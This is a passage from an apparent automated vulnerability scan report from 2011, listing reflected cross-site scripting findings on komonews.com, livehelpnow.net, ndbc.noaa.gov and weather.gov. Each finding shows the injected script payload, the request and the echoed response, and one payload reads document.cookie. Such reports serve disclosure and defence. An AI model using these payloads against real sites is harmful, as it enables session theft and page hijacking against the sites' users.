This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /opinion/kenschram/116741919.html?ca69c"><script>alert(1)</script>9fc7fa49d2e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53233


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   The Schram
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/opinion/kenschram/116741919.html?ca69c"><script>alert(1)</script>9fc7fa49d2e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.482. http://www.komonews.com/sports/116570948.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /sports/116570948.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2daa5"><script>alert(1)</script>8d3a804d9c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116570948.html?2daa5"><script>alert(1)</script>8d3a804d9c1=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57905


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Vargas, Fi
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116570948.html?2daa5"><script>alert(1)</script>8d3a804d9c1=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.483. http://www.komonews.com/sports/116572113.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /sports/116572113.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48b8c"><script>alert(1)</script>02763aa42e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116572113.html?48b8c"><script>alert(1)</script>02763aa42e7=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 59866


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Photos: 20
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116572113.html?48b8c"><script>alert(1)</script>02763aa42e7=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.484. http://www.komonews.com/sports/116601093.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /sports/116601093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9352c"><script>alert(1)</script>525cb61d364 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116601093.html?9352c"><script>alert(1)</script>525cb61d364=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54767


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Formula On
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116601093.html?9352c"><script>alert(1)</script>525cb61d364=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.485. http://www.komonews.com/sports/116612208.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /sports/116612208.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f55"><script>alert(1)</script>e47ddffc89d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116612208.html?d8f55"><script>alert(1)</script>e47ddffc89d=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 54887


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   Steinbrenn
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116612208.html?d8f55"><script>alert(1)</script>e47ddffc89d=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.486. http://www.komonews.com/sports/116713754.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /sports/116713754.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39190"><script>alert(1)</script>7100ee4ab24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/116713754.html?39190"><script>alert(1)</script>7100ee4ab24=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:15:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>

   
                                   UW cruises
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/sports/116713754.html?39190"><script>alert(1)</script>7100ee4ab24=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.487. http://www.komonews.com/younews [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /younews

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bdbd"><script>alert(1)</script>af961e96cd7 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /younews?cid=71571&c=y3bdbd"><script>alert(1)</script>af961e96cd7 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 87936

...[SNIP]...
<a class="nextpg" href="?cid=71571&c=y3bdbd"><script>alert(1)</script>af961e96cd7&pg=2">
...[SNIP]...

1.488. http://www.komonews.com/younews [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /younews

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90184"><script>alert(1)</script>ad8c8f43e27 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /younews?cid=7157190184"><script>alert(1)</script>ad8c8f43e27&c=y HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:14:30 GMT
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 64186

...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Channel" href="http://www.komonews.com/younews?xml=y&cid=7157190184"><script>alert(1)</script>ad8c8f43e27" />
...[SNIP]...

1.489. http://www.komonews.com/younews [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.komonews.com
Path:   /younews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 166b0"><script>alert(1)</script>31adaeb700e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /younews?cid=71571&c=y&166b0"><script>alert(1)</script>31adaeb700e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:14:54 GMT
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:14:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 87940

...[SNIP]...
<a class="nextpg" href="?cid=71571&c=y&166b0"><script>alert(1)</script>31adaeb700e=1&pg=2">
...[SNIP]...

1.490. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [lhnid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the lhnid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4fed0"%3balert(1)//c80c608b952 was submitted in the lhnid parameter. This input was echoed as 4fed0";alert(1)//c80c608b952 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=60&lhnid=12884fed0"%3balert(1)//c80c608b952&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sat, 26 Feb 2011 14:15:54 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9822


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
<img style='position:absolute;top:-5000px;left:-5000px;' width='1' height='1' src='https://www.livehelpnow.net/lhn/jsutil/showninvitationmessage.aspx?iplhnid=173.193.214.243|12884fed0";alert(1)//c80c608b952|2/26/2011 9:15:54 AM' />
...[SNIP]...

1.491. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93b1c'%3balert(1)//2105fc1f4f4 was submitted in the t parameter. This input was echoed as 93b1c';alert(1)//2105fc1f4f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=60&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f93b1c'%3balert(1)//2105fc1f4f4 HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sat, 26 Feb 2011 14:16:04 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9570


var lhnTrack='f93b1c';alert(1)//2105fc1f4f4';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pausecomp(millis)

...[SNIP]...

1.492. http://www.livehelpnow.net/lhn/scripts/lhnvisitor.aspx [zimg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livehelpnow.net
Path:   /lhn/scripts/lhnvisitor.aspx

Issue detail

The value of the zimg request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d46f1%3balert(1)//fb51e427c5d was submitted in the zimg parameter. This input was echoed as d46f1;alert(1)//fb51e427c5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lhn/scripts/lhnvisitor.aspx?div=&zimg=60d46f1%3balert(1)//fb51e427c5d&lhnid=1288&iv=&custom1=&custom2=&custom3=&t=f HTTP/1.1
Host: www.livehelpnow.net
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-application-controller-overview.php?40caf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E570f923664=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sat, 26 Feb 2011 14:15:53 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 9650


var lhnTrack='f';
if (typeof lhnInstalled !='undefined'){lhnTrack='f'}
var lhnInstalled=1;
var InviteRepeats;
var zbrepeat=1;
var bInvited=0;
var bLHNOnline=0;
InviteRepeats=0;

function pa
...[SNIP]...
mageserver.ashx?lhnid=" + 1288 + "&navname=" + lhnbrowser + "&java=" + lhnjava + "&referrer=" + lhnreferrer + "&pagetitle=" + lhnpagetitle + "&pageurl=" + lhnsPath + "&page=" + lhnsPage + "&zimg=" + 60d46f1;alert(1)//fb51e427c5d + "&sres=" + lhnsRes + "&sdepth=" + lhnsDepth + "&flash=" + lhnflashversion + "&custom1=&custom2=&custom3=&t=" +lhnTrack + "&d=&rndstr=" + lhnrand_no + "'>
...[SNIP]...

1.493. http://www.ndbc.noaa.gov/rss/ndbc_obs_search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndbc.noaa.gov
Path:   /rss/ndbc_obs_search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the XML document as plain text between tags. The payload d6e4c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>04979842 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6e4c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>04979842 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /rss/ndbc_obs_search.php/d6e4c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>04979842 HTTP/1.1
Host: www.ndbc.noaa.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.s={"v":1,"rid":"1298668135765_72177","pv":1,"to":3,"c":"http://www.noaa.gov/","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0,"f":1298668316368};

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:29:20 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: max-age=600, must-revalidate
Expires: Sat, 26 Feb 2011 02:39:20 GMT
Vary: Accept-Encoding
Content-Length: 1650
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="/rss/ndbcrss.xsl"?>
<rss version="2.0" xmlns:georss="http://www.georss.org/georss" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
...[SNIP]...
<br />
       Example: http://www.ndbc.noaa.gov/rss/ndbc_obs_search.php/d6e4c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>04979842?lat=25.5&amp;lon=-90.1&amp;radius=200<br />
...[SNIP]...

1.494. http://www.weather.gov/view/national.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.weather.gov
Path:   /view/national.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2293"%20a%3db%20405471de5b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2293" a=b 405471de5b4 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/national.php/b2293"%20a%3db%20405471de5b4 HTTP/1.1
Host: www.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Age: 0
X-Cache-TTL: 600
Date: Sat, 26 Feb 2011 02:30:09 GMT
Content-Length: 16299
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 26 Feb 2011 02:40:09 GMT
Cache-Control: max-age=600
Connection: close
Server: Apache
Vary: Accept-Encoding
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 26 Feb 2011 02:30:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="/view/national.php/b2293" a=b 405471de5b4?prod=QPF&amp;sid=ERD">
...[SNIP]...

1.495. http://www.weather.gov/view/states.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.weather.gov
Path:   /view/states.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c14"%20a%3db%201efb074e0de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c14" a=b 1efb074e0de in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /view/states.php/78c14"%20a%3db%201efb074e0de HTTP/1.1
Host: www.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Age: 0
X-Cache-TTL: 600
Date: Sat, 26 Feb 2011 02:32:11 GMT
Content-Length: 23972
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 26 Feb 2011 02:42:11 GMT
Cache-Control: max-age=600
Connection: close
Server: Apache
Vary: Accept-Encoding
Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 26 Feb 2011 02:32:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin template="/Te
...[SNIP]...
<a href="/view/states.php/78c14" a=b 1efb074e0de?state=AL">
...[SNIP]...

1.496. http://www.weather.gov/view/validProds.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
